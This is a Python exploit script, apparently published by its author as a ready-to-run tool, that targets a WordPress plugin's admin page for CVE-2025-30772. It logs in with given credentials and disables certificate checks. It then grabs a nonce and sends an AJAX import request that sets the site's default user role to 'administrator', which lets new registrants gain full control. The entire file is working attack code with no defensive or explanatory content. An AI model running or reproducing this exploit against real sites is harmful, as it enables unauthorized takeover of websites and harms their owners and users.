import requests import argparse import re import sys #by Nxploited | Khaled Alenazi, requests.packages.urllib3.disable_warnings() def create_session(): session = requests.Session() session.verify = False return session def authenticate(session, base_url, username, password): login_endpoint = f"{base_url}/wp-login.php" payload = { 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log+In' } headers = { 'User-Agent': 'Mozilla/5.0' } response = session.post(login_endpoint, data=payload, headers=headers) if not any('wordpress_logged_in' in c.name for c in session.cookies): sys.exit("[!] Login failed.") print("[+] Authenticated") def extract_nonce(session, base_url): page_url = f"{base_url}/wp-admin/admin.php?page=wpclever-wpcuf&tab=uf" response = session.get(page_url) match = re.search(r'"nonce":"(.*?)"', response.text) if not match: sys.exit("[!] Nonce not found.") print(f"[+] Nonce: {match.group(1)}") return match.group(1) def send_exploit(session, base_url, nonce): endpoint = f"{base_url}/wp-admin/admin-ajax.php" payload = { 'action': 'wpcuf_import_export_save', 'name': 'default_role', 'rules': '"administrator"', 'nonce': nonce } headers = { 'Content-Type': 'application/x-www-form-urlencoded' } response = session.post(endpoint, data=payload, headers=headers) if "Done!" in response.text: print("[+] Exploit executed successfully") else: print("[!] Exploit failed") print(response.text) def main(): parser = argparse.ArgumentParser(description="WordPress Privilege Escalation Exploit - CVE-2025-30772 # By Nxploited | Khaled ALenazi,") parser.add_argument("-u", "--url", required=True, help="Target base URL") parser.add_argument("-un", "--username", required=True, help="WordPress username") parser.add_argument("-p", "--password", required=True, help="WordPress password") args = parser.parse_args() session = create_session() authenticate(session, args.url, args.username, args.password) nonce = extract_nonce(session, args.url) send_exploit(session, args.url, nonce) if __name__ == "__main__": main()